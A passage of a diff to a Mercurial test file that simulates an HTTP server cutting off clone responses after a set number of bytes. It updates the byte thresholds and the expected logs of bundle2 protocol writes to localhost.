--pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1001 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -920,7 +920,7 @@ Server stops sending after bundle2 part header - $ hg serve --config badserver.closeaftersendbytes=1067 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1048 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -973,7 +973,7 @@ Server stops after bundle2 part payload chunk size - $ hg serve --config badserver.closeaftersendbytes=1088 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1069 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -1029,7 +1029,7 @@ Server stops sending in middle of bundle2 payload chunk - $ hg serve --config badserver.closeaftersendbytes=1549 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1530 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -1086,7 +1086,7 @@ Server stops sending after 0 length payload chunk size - $ hg serve --config badserver.closeaftersendbytes=1580 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1561 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -1148,8 +1148,7 @@ Server stops sending after 0 part bundle part header (indicating end of bundle2 payload) This is before the 0 size chunked transfer part that signals end of HTTP response. -# $ hg serve --config badserver.closeaftersendbytes=1755 -p $HGPORT -d --pid-file=hg.pid -E error.log - $ hg serve --config badserver.closeaftersendbytes=1862 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1736 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -1165,25 +1164,20 @@ $ killdaemons.py $DAEMON_PIDS #if py36 - $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -25 - sendall(9 from 9) -> (851) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (842) 4\\r\\n\x00\x00\x00)\\r\\n (esc) - sendall(47 from 47) -> (795) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) - sendall(9 from 9) -> (786) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) - sendall(473 from 473) -> (313) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (304) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (295) 4\\r\\n\x00\x00\x00 \\r\\n (esc) - sendall(38 from 38) -> (257) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) - sendall(9 from 9) -> (248) 4\\r\\n\x00\x00\x00:\\r\\n (esc) - sendall(64 from 64) -> (184) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n - sendall(9 from 9) -> (175) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (166) 4\\r\\n\x00\x00\x00#\\r\\n (esc) - sendall(41 from 41) -> (125) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) - sendall(9 from 9) -> (116) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (107) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc) - sendall(35 from 35) -> (72) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (63) 4\\r\\n\x00\x00\x00'\\r\\n (esc) - sendall(45 from 45) -> (18) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc) + $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -20 + sendall(9 from 9) -> (744) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (735) 4\\r\\n\x00\x00\x00)\\r\\n (esc) + sendall(47 from 47) -> (688) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) + sendall(9 from 9) -> (679) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) + sendall(473 from 473) -> (206) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (197) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (188) 4\\r\\n\x00\x00\x00 \\r\\n (esc) + sendall(38 from 38) -> (150) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) + sendall(9 from 9) -> (141) 4\\r\\n\x00\x00\x00:\\r\\n (esc) + sendall(64 from 64) -> (77) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n + sendall(9 from 9) -> (68) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (59) 4\\r\\n\x00\x00\x00#\\r\\n (esc) + sendall(41 from 41) -> (18) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) sendall(9 from 9) -> (9) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) sendall(9 from 9) -> (0) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) write limit reached; closing socket @@ -1193,25 +1187,20 @@ #else - $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -26 - write(9 from 9) -> (851) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (842) 4\\r\\n\x00\x00\x00)\\r\\n (esc) - write(47 from 47) -> (795) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) - write(9 from 9) -> (786) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) - write(473 from 473) -> (313) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (304) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (295) 4\\r\\n\x00\x00\x00 \\r\\n (esc) - write(38 from 38) -> (257) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) - write(9 from 9) -> (248) 4\\r\\n\x00\x00\x00:\\r\\n (esc) - write(64 from 64) -> (184) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n - write(9 from 9) -> (175) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (166) 4\\r\\n\x00\x00\x00#\\r\\n (esc) - write(41 from 41) -> (125) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) - write(9 from 9) -> (116) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (107) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc) - write(35 from 35) -> (72) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc) - write(9 from 9) -> (63) 4\\r\\n\x00\x00\x00'\\r\\n (esc) - write(45 from 45) -> (18) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc) + $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -21 + write(9 from 9) -> (744) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (735) 4\\r\\n\x00\x00\x00)\\r\\n (esc) + write(47 from 47) -> (688) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) + write(9 from 9) -> (679) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) + write(473 from 473) -> (206) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (197) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (188) 4\\r\\n\x00\x00\x00 \\r\\n (esc) + write(38 from 38) -> (150) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) + write(9 from 9) -> (141) 4\\r\\n\x00\x00\x00:\\r\\n (esc) + write(64 from 64) -> (77) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n + write(9 from 9) -> (68) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (59) 4\\r\\n\x00\x00\x00#\\r\\n (esc) + write(41 from 41) -> (18) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) write(9 from 9) -> (9) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) write(9 from 9) -> (0) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) write limit reached; closing socket @@ -1227,7 +1216,7 @@ Server sends a size 0 chunked-transfer size without terminating \r\n - $ hg serve --config badserver.closeaftersendbytes=1865 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1739 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -1243,25 +1232,20 @@ $ killdaemons.py $DAEMON_PIDS #if py36 - $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -26 - sendall(9 from 9) -> (854) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (845) 4\\r\\n\x00\x00\x00)\\r\\n (esc) - sendall(47 from 47) -> (798) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) - sendall(9 from 9) -> (789) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) - sendall(473 from 473) -> (316) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (307) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (298) 4\\r\\n\x00\x00\x00 \\r\\n (esc) - sendall(38 from 38) -> (260) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) - sendall(9 from 9) -> (251) 4\\r\\n\x00\x00\x00:\\r\\n (esc) - sendall(64 from 64) -> (187) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n - sendall(9 from 9) -> (178) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (169) 4\\r\\n\x00\x00\x00#\\r\\n (esc) - sendall(41 from 41) -> (128) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) - sendall(9 from 9) -> (119) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (110) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc) - sendall(35 from 35) -> (75) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (66) 4\\r\\n\x00\x00\x00'\\r\\n (esc) - sendall(45 from 45) -> (21) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc) + $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -21 + sendall(9 from 9) -> (747) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (738) 4\\r\\n\x00\x00\x00)\\r\\n (esc) + sendall(47 from 47) -> (691) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) + sendall(9 from 9) -> (682) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) + sendall(473 from 473) -> (209) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (200) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (191) 4\\r\\n\x00\x00\x00 \\r\\n (esc) + sendall(38 from 38) -> (153) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) + sendall(9 from 9) -> (144) 4\\r\\n\x00\x00\x00:\\r\\n (esc) + sendall(64 from 64) -> (80) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n + sendall(9 from 9) -> (71) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (62) 4\\r\\n\x00\x00\x00#\\r\\n (esc) + sendall(41 from 41) -> (21) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) sendall(9 from 9) -> (12) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) sendall(9 from 9) -> (3) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) sendall(3 from 5) -> (0) 0\r\n @@ -1272,25 +1256,20 @@ #else - $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -27 - write(9 from 9) -> (854) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (845) 4\\r\\n\x00\x00\x00)\\r\\n (esc) - write(47 from 47) -> (798) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) - write(9 from 9) -> (789) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) - write(473 from 473) -> (316) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (307) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (298) 4\\r\\n\x00\x00\x00 \\r\\n (esc) - write(38 from 38) -> (260) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) - write(9 from 9) -> (251) 4\\r\\n\x00\x00\x00:\\r\\n (esc) - write(64 from 64) -> (187) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n - write(9 